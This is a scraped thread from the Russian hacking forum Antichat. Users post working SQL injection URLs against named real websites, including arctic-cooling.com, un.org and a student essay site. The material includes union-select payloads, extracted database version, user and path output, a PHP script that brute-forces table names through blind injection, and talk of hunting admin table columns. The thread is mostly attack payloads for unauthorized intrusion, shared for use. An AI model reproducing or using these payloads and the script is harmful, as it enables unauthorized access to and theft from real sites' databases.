ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11061  
Старый 03.01.2010, 18:25
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от Stalingrad  
http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--

version(): 4.0.27-standard
Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(

Jerri,

http://www.un.org/sg/articleFullsearch.asp?TID=1+or+1=(select+top+1+fai ledemailaddress+from+newsadmin.failedemails)--+
 
Ответить с цитированием

  #11062  
Старый 03.01.2010, 18:51
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Нашел =)

http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+
 
Ответить с цитированием

  #11063  
Старый 03.01.2010, 20:35
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию

ElteRUS,спс.
 
Ответить с цитированием

  #11064  
Старый 03.01.2010, 21:29
Аватар для Stalingrad
Stalingrad
Познающий
Регистрация: 18.03.2006
Сообщений: 47
Провел на форуме:
311345

Репутация: 9
По умолчанию

Цитата:
Сообщение от ElteRUS  
Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(
А мне вот интересно всетаки,можно ли чтото сделать именно с первой ссылкой там где параметр подставляется в несколько запросов.Просто есть тема на античате https://forum.antichat.ru/showpost.php?p=1047720&postcount=74

Там вот похожий случай,я пытался и так но не получалось.А за то что нашел спасибо , теперь надо подобрать колонки к таблице admin, но ниче не выходит.Может они на немецком/швейцарском
 
Ответить с цитированием

  #11065  
Старый 03.01.2010, 22:32
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от ElteRUS  
Нашел =)

http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+
Вирус, товарщь!
 
Ответить с цитированием

  #11066  
Старый 04.01.2010, 05:07
Аватар для Micr0b
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

вопрос! нашел слепую скуль на одном с порталов одного очень популярного ресурса!
Возникают сразу два вопроса:
1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
2. Возникла проблема в переборе!

Юзаю такой запрос:
Код:
+and+(select+lower(substring(user(),1,1))+from+information_schema.tables+limit+0,1)='a'
Написал скрипт аналогов которому море,
PHP код:
<form method="post">
<input type="type" name="url" value="http://.html?h=15" size="150">
limit <input type="type" name="ntab" value="17" size="1">,1
<input type="submit" name="start" value="Start" style="cursor:pointer">
</form>

<?
$brutelist 
="qwertyuiopasdfghjklzxcvbnm1234567890_";
//$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_+!@#\$%^&*\ '\"()";
$word '<div class="clear mb25">'//
$url=$_POST['url']; //
$ntab=$_POST['ntab'];

if(
$_POST['start']){
    for(
$i=1;$i<=10;$i++){ // Позиція символа перебираємої таблиці
        
for($j=0;$j<strlen($brutelist);$j++){ // Перебирання символа
            
$linkout=@file_get_contents($url."+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+".$ntab.",1)='".$brutelist[$j]."'");
            
preg_match_all($word,$linkout,$out);
            if(!
$out[0][0]==""){
                
//echo "<br>".$i."[".$brutelist[$j]."] http://.html?h=15+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+17,1)='".$brutelist[$j]."'";
                
$fp=fopen("_.txt","a+"); 
                
fwrite($fp,$brutelist[$j]);
                
fclose($fp);
            }
            
        }
    }
}
?>
проблема долго юзать перебирать и все такое.. есть альтернатива.?
читал статью _http://www.xakep.ru/post/49697/default.asp
ошибок нет, ascii не разрешено юзать, ничего не выводит.
Жду похорошо професионального ответа.

Последний раз редактировалось Micr0b; 04.01.2010 в 05:10..
 
Ответить с цитированием

  #11067  
Старый 04.01.2010, 06:48
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
reserse ip ?
 
Ответить с цитированием

  #11068  
Старый 04.01.2010, 14:49
Аватар для Micr0b
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

ну да чото забыл)
Кстати проверил mail.ru выдал:
Inbox.ru
Mail.ru
Porsche924.ru

Тоже самое когда *.mail.ru
Для болие точного результату спрошу, тоисть отрицательный?
 
Ответить с цитированием

  #11069  
Старый 04.01.2010, 18:14
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

я в html файле пишу <script>...</script>, а <html><head><title><bodyl><head><title><body> Писать?> Писать?
 
Ответить с цитированием

  #11070  
Старый 04.01.2010, 18:59
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от Strilo4ka  
если

кто хочет может поиграться банк рефератов!!!
класический вариант юнион + селект не проходит и с дупликатами тоже
Код:
http://www.bank-referatov.info/info.php?id=106+and+1=1+and+substring(version(),1,1)=5

@@basedir: /
@@tmpdir: /tmp/
database(): kupich_kur
@@datadir: /var/lib/mysql/
version(): 5.0.87-community
user(): kupich_Kupich@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ